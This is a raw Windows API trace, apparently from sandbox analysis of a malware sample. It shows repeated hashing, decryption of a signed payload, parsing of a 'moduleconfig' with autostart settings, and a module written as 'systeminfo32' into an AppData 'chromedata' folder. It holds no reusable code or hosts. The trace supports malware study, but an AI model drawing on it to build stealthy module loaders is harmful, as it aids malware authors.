	[0154.935] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.935] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.935] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.935] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.935] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0154.935] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.936] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310a28
	[0154.936] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310a28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310a28, pdwDataLen=0x128aac) returned 1
	[0154.936] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.936] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.936] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.936] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.936] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0154.936] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.936] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310a50
	[0154.936] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310a50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310a50, pdwDataLen=0x128aac) returned 1
	[0154.936] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.936] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.936] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.936] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.936] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0154.937] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.937] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310a78
	[0154.937] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310a78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310a78, pdwDataLen=0x128aac) returned 1
	[0154.937] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.937] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.937] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.937] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.937] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0154.937] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.937] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310aa0
	[0154.937] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310aa0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310aa0, pdwDataLen=0x128aac) returned 1
	[0154.937] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.937] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.937] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.938] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.938] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0154.938] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.938] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310ac8
	[0154.938] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310ac8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310ac8, pdwDataLen=0x128aac) returned 1
	[0154.938] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.938] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.938] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.938] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.938] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0154.938] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.938] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310af0
	[0154.939] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310af0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310af0, pdwDataLen=0x128aac) returned 1
	[0154.939] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.939] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.939] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.939] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.939] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0154.939] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.939] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310b18
	[0154.939] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310b18, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310b18, pdwDataLen=0x128aac) returned 1
	[0154.939] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.939] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.939] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.939] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.939] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0154.940] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.940] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310b40
	[0154.940] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310b40, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310b40, pdwDataLen=0x128aac) returned 1
	[0154.940] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.940] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.940] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.940] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.940] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0154.940] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.940] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310b68
	[0154.940] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310b68, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310b68, pdwDataLen=0x128aac) returned 1
	[0154.940] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.940] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.940] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.941] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.941] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0154.941] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.941] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310b90
	[0154.941] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310b90, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310b90, pdwDataLen=0x128aac) returned 1
	[0154.941] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.941] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.941] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.941] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.941] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0154.941] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.941] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310bb8
	[0154.941] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310bb8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310bb8, pdwDataLen=0x128aac) returned 1
	[0154.941] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.941] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.941] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.942] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.942] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0154.942] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.942] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310be0
	[0154.942] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310be0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310be0, pdwDataLen=0x128aac) returned 1
	[0154.942] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.942] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.942] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.942] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.942] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0154.942] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.942] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310c08
	[0154.942] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310c08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310c08, pdwDataLen=0x128aac) returned 1
	[0154.942] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.942] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.942] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.943] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.943] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0154.943] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.943] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310c30
	[0154.943] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310c30, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310c30, pdwDataLen=0x128aac) returned 1
	[0154.943] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.943] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.943] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.943] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.943] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0154.943] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.943] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310c58
	[0154.943] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310c58, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310c58, pdwDataLen=0x128aac) returned 1
	[0154.943] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.943] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.943] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.944] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.944] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0154.944] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.944] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310c80
	[0154.944] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310c80, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310c80, pdwDataLen=0x128aac) returned 1
	[0154.944] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.944] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.944] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.944] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.944] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0154.944] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.944] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310ca8
	[0154.944] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310ca8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310ca8, pdwDataLen=0x128aac) returned 1
	[0154.944] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.944] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.944] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2731588) returned 1
	[0154.944] CryptAcquireContextW (in: phProv=0x128ad8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ad8*=0x225390) returned 1
	[0154.945] CryptImportKey (in: hProv=0x225390, pbData=0x128aa0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x128ae0 | out: phKey=0x128ae0*=0x22b68c0) returned 1
	[0154.945] CryptSetKeyParam (hKey=0x22b68c0, dwParam=0x4, pbData=0x128acc*=0x1, dwFlags=0x0) returned 1
	[0154.945] CryptSetKeyParam (hKey=0x22b68c0, dwParam=0x1, pbData=0x2310ca8, dwFlags=0x0) returned 1
	[0154.945] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x4080) returned 0x262ed0
	[0154.945] CryptDecrypt (in: hKey=0x22b68c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x262ed0, pdwDataLen=0x128ad4 | out: pbData=0x262ed0, pdwDataLen=0x128ad4) returned 1
	[0154.945] CryptDestroyKey (hKey=0x22b68c0) returned 1
	[0154.945] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.945] GetVersion () returned 0x1db10106
	[0154.945] CryptAcquireContextW (in: phProv=0x1289e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1289e0*=0x225390) returned 1
	[0154.946] CryptCreateHash (in: hProv=0x225390, Algid=0x800d, hKey=0x0, dwFlags=0x0, phHash=0x1289e4 | out: phHash=0x1289e4) returned 1
	[0154.946] CryptHashData (hHash=0x22b6840, pbData=0x262ed0, dwDataLen=0x4008, dwFlags=0x0) returned 1
	[0154.946] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x1289dc, pdwDataLen=0x1289d8, dwFlags=0x0 | out: pbData=0x1289dc, pdwDataLen=0x1289d8) returned 1
	[0154.946] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5f18
	[0154.946] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x22a5f18, pdwDataLen=0x1289dc, dwFlags=0x0 | out: pbData=0x22a5f18, pdwDataLen=0x1289dc) returned 1
	[0154.946] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.946] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.946] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x128ae0, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x128ae0) returned 0x0
	[0154.947] BCryptImportKeyPair (in: hAlgorithm=0x22ee168, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x128ae8, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x128ae8) returned 0x0
	[0154.949] BCryptGetProperty (in: hObject=0x212650, pszProperty="SignatureLength", pbOutput=0x128b00, cbOutput=0x4, pcbResult=0x128ad8, dwFlags=0x0 | out: pbOutput=0x128b00, pcbResult=0x128ad8) returned 0x0
	[0154.949] BCryptVerifySignature (hKey=0x212650, pPaddingInfo=0x0, pbHash=0x22a5f18, cbHash=0x30, pbSignature=0x266ed8, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0154.951] BCryptDestroyKey (in: hKey=0x212650 | out: hKey=0x212650) returned 0x0
	[0154.951] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee168, dwFlags=0x0 | out: hAlgorithm=0x22ee168) returned 0x0
	[0154.951] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5f18) returned 1
	[0154.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x4000) returned 0x26c8c38
	[0154.951] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x230d870) returned 1
	[0154.951] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310ca8) returned 1
	[0154.951] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x262ed0) returned 1
	[0154.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310ca8
	[0154.951] lstrlenA (lpString="<moduleconfig>*</moduleconfig>") returned 30
	[0154.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22acdf0
	[0154.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x180) returned 0x219e48
	[0154.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2731588
	[0154.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad1f8
	[0154.951] CharLowerBuffA (in: lpsz="moduleconfig", cchLength=0xc | out: lpsz="moduleconfig") returned 0xc
	[0154.951] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1f8) returned 1
	[0154.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad1f8
	[0154.951] CharLowerBuffA (in: lpsz="autostart", cchLength=0x9 | out: lpsz="autostart") returned 0x9
	[0154.951] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1f8) returned 1
	[0154.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad1f8
	[0154.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad1e0
	[0154.952] CharLowerBuffA (in: lpsz="limit", cchLength=0x5 | out: lpsz="limit") returned 0x5
	[0154.952] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1e0) returned 1
	[0154.952] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad1e0
	[0154.952] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22b5da8
	[0154.952] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x22b5da8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0154.952] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0154.952] WriteFile (in: hFile=0x48c, lpBuffer=0x272c4c8*, nNumberOfBytesToWrite=0x40b0, lpNumberOfBytesWritten=0x128b40, lpOverlapped=0x0 | out: lpBuffer=0x272c4c8*, lpNumberOfBytesWritten=0x128b40*=0x40b0, lpOverlapped=0x0) returned 1
	[0154.954] CloseHandle (hObject=0x48c) returned 1
	[0154.954] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x272c4c8) returned 1
	[0154.954] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b5da8) returned 1
	[0154.954] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7038) returned 1
	[0154.954] WinHttpCloseHandle (hInternet=0x22bb5e0) returned 1
	[0154.954] WinHttpCloseHandle (hInternet=0x22c4ea8) returned 1
	[0154.954] WinHttpCloseHandle (hInternet=0x22c4dc0) returned 1
	[0154.954] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23065c8) returned 1
	[0154.954] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad210
	[0154.954] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307960) returned 1
	[0154.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="systeminfo32", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
	[0154.954] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad228
	[0154.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="systeminfo32", cchWideChar=-1, lpMultiByteStr=0x22ad228, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="systeminfo32", lpUsedDefaultChar=0x0) returned 13
	[0154.954] lstrcmpiW (lpString1="GetSystemInfo", lpString2="start") returned -1
	[0154.954] lstrcmpiW (lpString1="GetSystemInfo", lpString2="release") returned -1
	[0154.954] CloseHandle (hObject=0x0) returned 0
	[0154.954] CloseHandle (hObject=0x0) returned 0
	[0154.954] CloseHandle (hObject=0x0) returned 0
	[0154.954] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307960
